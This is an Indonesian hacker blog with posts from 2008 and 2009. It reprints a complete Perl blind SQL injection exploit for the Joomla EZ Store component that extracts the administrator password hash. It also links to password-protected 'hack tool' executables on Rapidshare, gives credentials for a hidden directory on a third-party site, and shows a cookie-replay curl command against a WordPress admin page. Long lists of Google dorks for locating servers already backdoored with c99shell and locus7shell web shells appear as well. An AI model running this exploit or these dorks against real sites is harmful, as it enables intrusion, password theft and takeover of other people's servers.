Mar 11
ehlo
posted by: yud1z in Computer on 03 11th, 2009 | | 1 Comment »

$ curl -H “Cookie: my cookies here” -H “Host: ” http://www.mhs.blog.ui.ac.id/langi.yudhistiara/wp-admin/profile.php> tmp.html $ firefox tmp.html

Universitas Indonesia
Sep 16
Booting xcode linux lewat usb
posted by: yud1z in Computer on 09 16th, 2008 | | No Comments »
Universitas Indonesia
Sep 5
#4×0r5 tool(beta)
posted by: yud1z in Computer on 09 5th, 2008 | | No Comments »

buat yang bingung tulisan apaan neeh

neh tul hack gabungan dari gw, 90% udah live jadi nggak usah diinstall

cukup di extract aja, maaf bind ini lom gw sempurnain (masih beta)

bentuknya sama kek yud1z hacktool 2008 jadi nggak usah bingung

klo gitu

masih beta neeh, di mohon komennya tuk menyempurnakan

oh ya semuanya gw compress 7z bukanya pake PEA zip dah ada di folder archiver

http://rapidshare.com/files/142764088/_4×0r5.exe

ten kyu

greetz to:

panther ranger crew

blackhat

Universitas Indonesia
Aug 18
hack & destroy
posted by: yud1z in Computer on 08 18th, 2008 | | 4 Comments »

tul lagi neeh

aio

hack & destroy tahun 2007, mang udah lama sich, tapi inget kenangan masa lampau

http://rapidshare.com/files/138241776/hack_destroy.exe

sorry nggak ada screenshot, yud1z lagi malez soalnya udah nggak punya kerjaan

Universitas Indonesia
Aug 18
Hacking Joomla Component “EZ Store”
posted by: yud1z in Computer on 08 18th, 2008 | | 1 Comment »

hajar jooomla neeh, pake teknik Remote Blind SQL Injection Exploit, trus tinggal compile deh

#!/usr/bin/perl
#Note:Sometimes you have to change the regexp to  viewcategory/catid,".$cid."
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
  print "                                                                  \n";
    print "   ################################################################\n";
  print "   #   Joomla Component EZ Store Blind SQL Injection Exploit      #\n";
  print "   #   Author:His0k4 [ALGERIAN HaCkeR]                            #\n";
  print "   #                                                              #\n";
  print "   #   Conctact: His0k4.hlm[at]gamil.com                          #\n";
  print "   #   Greetz:   All friends & muslims HacKeRs                    #\n";
  print "   #   Greetz2:  http://www.dz-secure.com                         #\n";
  print "   #                                                              #\n";
  print "   #   Dork:    inurl:com_ezstore                                 #\n";
  print "   #   Usage:   perl ezstore.pl host path <options>               #\n";
  print "   #   Example: perl ezstore.pl www.host.com /joomla/ -p 11 -c 2  #\n";
  print "   #                                                              #\n";
  print "   #   Options:                                                   #\n";
  print "   #     -t    Valid  procuct id                                  #\n";
  print "   #     -c    Category value of the following  product id        #\n";
  print "   ################################################################\n";

  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $cid     = $ARGV[2];
my $pid     = $ARGV[3];

my %options = ();
GetOptions(\%options, "c=i", "x=s", "p=i");

print "[~] Exploiting...\n";

if($options{"c"})
{
  $cid = $options{"c"};
}

if($options{"p"})
{
  $pid = $options{"p"};
}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $f = 0;
  my $h = 48;
  while(!$f && $h <= 57)
  {
    if(istrue2($host, $path, $cid, $pid, $i, $h))
    {
      $f = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$f)
  {
    $h = 97;
    while(!$f && $h <= 122)
    {
      if(istrue2($host, $path, $cid, $pid, $i, $h))
      {
        $f = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[~] Exploiting done\n";

sub istrue2
{
  my $host  = shift;
  my $path  = shift;
  my $cid   = shift;
  my $pid   = shift;
  my $i     = shift;
  my $h     = shift;
 
  my $ua = LWP::UserAgent->new;
  my $query = "http://".$host.$path."index.php?option=com_ezstore&Itemid=1&func=detail&id=".$pid." and (SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=CHAR(".$h.")";
 
  if($options{"x"})
  {
    $ua->proxy('http', "http://".$options{"x"});
  }
 
  my $resp = $ua->get($query);
  my $content = $resp->content;
  my $regexp = "viewcategory&catid=".$cid."";
 
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }

}

# milw0rm.com [2008-08-03]
Universitas Indonesia
Aug 16
donlot di rapidshare
posted by: yud1z in Computer on 08 16th, 2008 | | 2 Comments »

buat yang bingung cara donlot rapidshare

ada rapidleech neeh

http://www.christopheracademy.com/images/.system/kambe username : kambe password : newbee

Universitas Indonesia
Aug 12
hack tool 2008
posted by: yud1z in Computer on 08 12th, 2008 | | 1 Comment »

hackerz tool nih gw bind sendiri

http://rapidshare.com/files/136695327/yud1z_hacktool_2008.exe.html

passs : tigatiga

Universitas Indonesia
Aug 10
list shell backdoor baru lagi
posted by: yud1z in Computer on 08 10th, 2008 | | 3 Comments »
33        28.45%  powered by captain crunch security team
6          5.17%  safe-mode: off (not secure)
5          4.31%  home
4          3.45%  basel 2.2
4          3.45%  safe-mode: off (not secure) drwxrwxrwx
3          2.59%  c99memoryl
3          2.59%  c99shell [file on secure ok ]
3          2.59%  c99shell v. 1.0 pre-release build #16
3          2.59%  hacker
3          2.59%  uid=99(nobody) gid=99(nobody) groups=99(nobody)
2          1.72%  --[ c99shell v. 1.0 pre-release build #16
2          1.72%  basel
2          1.72%  c99shell v. 1.0 pre-release build
2          1.72%  powered by captain crunch security team | http://ccteam.ru |
2          1.72%  safe-mode : off ( not secured ) drwxrwxrwx
2          1.72%  safe-mode: off (not secure) drwxrwxrwx c99shell
1          0.86%  !c99shell v. 1.0 pre-release build #16!
1          0.86%  --[ c99shell v. 1.0 pre-release build
1          0.86%  -[ c99shell v. 1.0 pre-release build #16 powered by captain cru
1          0.86%  /opt/zope/lib/python/zdaemon/zdrun.py
1          0.86%  allintext:”safe-mode: off (not secure)”
1          0.86%  allinurl:selfremove
1          0.86%  basel documentation
1          0.86%  c99memory.php
1          0.86%  c99shell safe-mode : off ( not secured ) drwxrwxrwx
1          0.86%  c99shell v. 1.0 pre-release build #16 powered by captain crunch
1          0.86%  c99shell v. 1.0 pre-release uname
1          0.86%  c99shell v. pre-release build
1          0.86%  captain crunch security team
1          0.86%  code safe-mode: off (not secure) drwxrwxrwx c99shell
1          0.86%  drwxrwxrwx c99shell filetype:php
1          0.86%  encoder bind proc. ftp brute sec. sql php-code feedback self re
1          0.86%  encoder tools proc. ftp brute sec. sql php-code update feedback
1          0.86%  home updir search buffer tools proc ftp brute sec sql self remo
1          0.86%  how to restore using !c99memory v. 1.0 pre-release build #16!
1          0.86%  intext:c99memory v. 1.0
1          0.86%  intext:safe-mode: off (not secure)
1          0.86%  intext:safe-mode: off (not secure) tooling
1          0.86%  inurl:act=sql
1          0.86%  name asc. size · modify · owner/group · perms action
1          0.86%  php safe-mode drwxrwxrwx
1          0.86%  php4 timezone database
1          0.86%  powered by captain crunch security team drwxrwxrwx
1          0.86%  powered by captain crunch security team | http://ccteam.ru
1          0.86%  safe mode: off ( not secure )
1          0.86%  safe mode: off (not secure)
1          0.86%  safe-mode: off (not secure) / tmp/ drwxrwxrwx
1          0.86%  safe-mode: off (not secure) site:pt
1          0.86%  shell powered by captain crunch security team
1          0.86%  site:www.astro.mat.uc.pt basel
1          0.86%  uid= gid= groups= sql uname -a
1          0.86%  uid=99 ( nobody ) gid=99 ( nobody )
1          0.86%  uid=99(nobody) gid=99(nobody) groups=99(nobody)safe-mode: off (
Universitas Indonesia
Aug 10
Surat Cinta Seorang Hacker
posted by: yud1z in Computer on 08 10th, 2008 | | 4 Comments »

Seandainya hatimu adalah sebuah system, maka aku akan scan kamu untuk mengetahui port mana yang terbuka Sehingga tidak ada keraguan saat aku c:\> nc -l -o -v -e ke hatimu,tapi aku hanya berani ping di belakang anonymouse proxy, inikah rasanya jatuh cinta sehingga membuatku seperti pecundang atau aku memang pecundang sejati whatever!

Seandainya hatimu adalah sebuah system, ingin rasanya aku manfaatkan vulnerabilitiesmu, pake PHP injection Terus aku ls -la; find / -perm 777 -type d,sehingga aku tau kalo di hatimu ada folder yang bisa ditulisi atau adakah free space buat aku?. apa aku harus pasang backdor “Remote Connect-Back Shell”jadi aku tinggal nunggu koneksi dari kamu saja, biar aku tidak merana seperti ini.

Seandainya hatimu adalah sebuah system, saat semua request-ku diterima aku akan nogkrong terus di bugtraq untuk mengetahui bug terbarumu maka aku akan patch n pacth terus,aku akan jaga service-mu jangan sampai crash n aku akan menjadi firewallmu aku akan pasang portsentry, dan menyeting error pagemu ” The page cannot be found Coz Has Been Owned by Someone get out!” aku janji gak bakalan ada macelinious program atau service yang hidden, karena aku sangat sayang dan mencintaimu.

Seandainya hatimu adalah sebuah system, jangan ada kata “You dont have permission to access it” untuk aku, kalau ga mau di ping flood Atau DDos Attack jangan ah….! kamu harus menjadi sang bidadari penyelamatku.

Seandainya hatimu adalah sebuah system, …?

Tapi sayang hatimu bukanlah sebuah system, kamu adalah sang bidadari impianku, yang telah mengacaukan systemku! Suatu saat nanti aku akan datang n mengatakan kalau di hatiku sudah terinfeksi virus yang Menghanyutkan, Ga ada anti virus yang dapat menangkalnya selain …kamu.

wekz……..

Universitas Indonesia
Aug 9
list shell backdoor
posted by: yud1z in Computer on 08 9th, 2008 | | 3 Comments »
shell c99

11        13.41%  powered by captain crunch security team
6          7.32%  locus7shell
4          4.88%  shell
3          3.66%  kuwait hacker
3          3.66%  php safe-mode bypass (list directories):
3          3.66%  safe-mode: off (not secure)
3          3.66%  safe-mode: off (not secure) drwxrwxrwx c99shell
3          3.66%  startpar -f
2          2.44%  hs_kuwait.php
2          2.44%  lejeune interpolate
2          2.44%  name asc. size · modify · owner/group · perms action
2          2.44%  shell c99 ccteam.r
1          1.22%  .phpact=f shell
1          1.22%  00007458 zip
1          1.22%  allintext:”safe-mode: off (not secure)
1          1.22%  allintitle: \locus7shell\
1          1.22%  allintitle: c99memoryl
1          1.22%  allinurl:upload3.php
1          1.22%  astro acrobat
1          1.22%  basel
1          1.22%  basel stellar library
1          1.22%  c99memory
1          1.22%  c99memoryl
1          1.22%  c99shell v. 1.0 pre-release build #16
1          1.22%  class-efem
1          1.22%  efemerides del 22 de abril
1          1.22%  encoder bind proc. ftp brute sec. sql php-
1          1.22%  encoder bind proc. ftp brute sec. sql php-code feedback
1          1.22%  encoder bind proc. ftp brute sec. sql php-code update feedback 
1          1.22%  encoder tools proc. ftp brute sec. sql php-code update feedback
1          1.22%  filetype:php shell
1          1.22%  foreach (array(sortsql_sort) as $v)
1          1.22%  i.s.s.w team ...
1          1.22%  intitle:locus7shell
1          1.22%  inurl:ftpquickbrute
1          1.22%  inurl:php drwxrwxr-x ftp brute sql
1          1.22%  lejeune interpolation
1          1.22%  lejuene interpolate
1          1.22%  lmgrd_start 47
1          1.22%  mysqld usage of cpu suse httpd2-prefork
1          1.22%  php echo getenv
1          1.22%  php4 “registered stream socket transports”
1          1.22%  powered by captain crunch filetype:php
1          1.22%  powered by captain crunch security team drwxrwxrwx
1          1.22%  powered by captain crunch security team | http://ccteam.ru |
1          1.22%  safe mode : off (not secure)
1          1.22%  safe-mode:
1          1.22%  select action/file-type:
1          1.22%  software make dir upload file safe-mode
1          1.22%  uid=30(wwwrun) gid=8(www)

lucos shell

64        24.81%  locus7shell
31        12.02%  intitle:locus7shell
12         4.65%  locus7shell filetype:php
8          3.10%  locus7shell uname
6          2.33%  allintitle: locus7shell
5          1.94%  - locus7shell
5          1.94%  intitle:- locus7shell
5          1.94%  x2300 locus7shell
4          1.55%  --[ x2300 locus7shell v. 1.0a beta modded by #!physx^ |
4          1.55%  allintitle:- locus7shell
4          1.55%  intitle: - locus7shell
4          1.55%  safe-mode: off (not secure)
3          1.16%  locus7shell 2008
3          1.16%  shell x2300 locus7shell
2          0.78%  .br - locus7shell
2          0.78%  .us/images/0/588/mo_656_656.swf
2          0.78%  allintext:--[ x2300 locus7shell v. modded by #!physx^
2          0.78%  allintitle: - locus7shell
2          0.78%  allintitle: locus7shell ext:php
2          0.78%  allintitle:locus7shell
2          0.78%  allintitle:locus7shell filetype:php
2          0.78%  free locus7shell
2          0.78%  ftp brute sec. sql php-code
2          0.78%  inurl:act=sql
2          0.78%  locus7s off secure
2          0.78%  locus7s shell
2          0.78%  locus7shell apache
2          0.78%  locus7shell edition 2008
2          0.78%  locus7shell filetype: 'php'
2          0.78%  locus7shell index:php
2          0.78%  locus7shell linux 2008
2          0.78%  locus7shell modified
2          0.78%  php safe-mode bypass (list directories):
2          0.78%  safe-mode: off (not secure) drwxrwxrwx locus7shell
1          0.39%  %%% locus7shell
1          0.39%  - locus7shell windows
1          0.39%  --[ x2300 locus7shell v. 1.0a beta modded by #!physx^ | www.loc
1          0.39%  --[ x2300 locus7shell v. modded by #!physx^ | www.locus7s.com |
1          0.39%  --[ x2300 locus7shell v.1.0a beta modded by #!physx^ | www.locu
1          0.39%  /locus7shell/
1          0.39%  [enumerate] [encoder] [tools] [proc.] [ftp brute] [sec.] [sql] 
1          0.39%  allintext: locus7shell v. 1.0a beta
1          0.39%  allintext:”safe-mode: off (not secure)”
1          0.39%  allintitle: \locus7shell\
1          0.39%  allinurl: .phpact=ls
1          0.39%  apache aix aixthread_scope
1          0.39%  ar ba locus7shell
1          0.39%  basel
1          0.39%  basel 3.1 library
1          0.39%  basel interpolation
1          0.39%  basel interpolation engine
1          0.39%  basel spectra
1          0.39%  c99memoryl
1          0.39%  encoder bind proc. ftp brute sec. sql php-code feedback self re
1          0.39%  filetype locus7shell
1          0.39%  interpolation engine
1          0.39%  intext:'' safe-mode:off (not secure)''
1          0.39%  intitle:- locus7shell'
1          0.39%  intitle:c99memoryl inurl:.php
1          0.39%  intitle:locus7shell by filetype:php
1          0.39%  intitle:locus7shell drwxr-xr-x
1          0.39%  inurl:.phpact=ls
1          0.39%  inurl:act intext:full hexdump
1          0.39%  license.dat idl server bypass
1          0.39%  locus7s uname
1          0.39%  locus7shell 2.0
1          0.39%  locus7shell [file on secure ok ] drwxrwxrwx
1          0.39%  locus7shell intext:x2300 intext:milw0rm.it enumerate uname
1          0.39%  locus7shell inurl:php
1          0.39%  locus7shell linux
1          0.39%  locus7shell linux 2006
1          0.39%  locus7shell safe-mode: off (not secure) drwxrwxrwx
1          0.39%  locus7shell self remove drwxrwxrwx
1          0.39%  locus7shell v. 1.0
1          0.39%  locus7shell windows 2008
1          0.39%  locus7shell-
1          0.39%  make dir make file ok read files locus7shell
1          0.39%  modded locus7shell
1          0.39%  php safe-mode bypass (list directories)
1          0.39%  php safe-mode bypass (read file)
1          0.39%  php safe-mode bypass (read files)
1          0.39%  safe-mode: apache uname -a: linux filetype:php
1          0.39%  safe-mode: off (not secure) / tmp/ drwxrwxrwx
1          0.39%  safe-mode: off (not secure) locus7shell
1          0.39%  safe_mode: off drwxr-xr-x locus7shell
1          0.39%  software: safe-mode: off (not secure) your ip: - server ip: [ft
1          0.39%  suhosin 5.1.2
1          0.39%  sybase aixthread_scope
1          0.39%  uploads/ drwxrwxrwx
1          0.39%  warning kernel may be alerted using higher levels safe mode
1          0.39%  x2300 locus7shell download
1          0.39%  x2300 locus7shell modified by #!physx^
1          0.39%  x2300 locus7shell v. 1.0a
1          0.39%  x2300 locus7shell v. 1.0a beta
Universitas Indonesia

« Previous Entries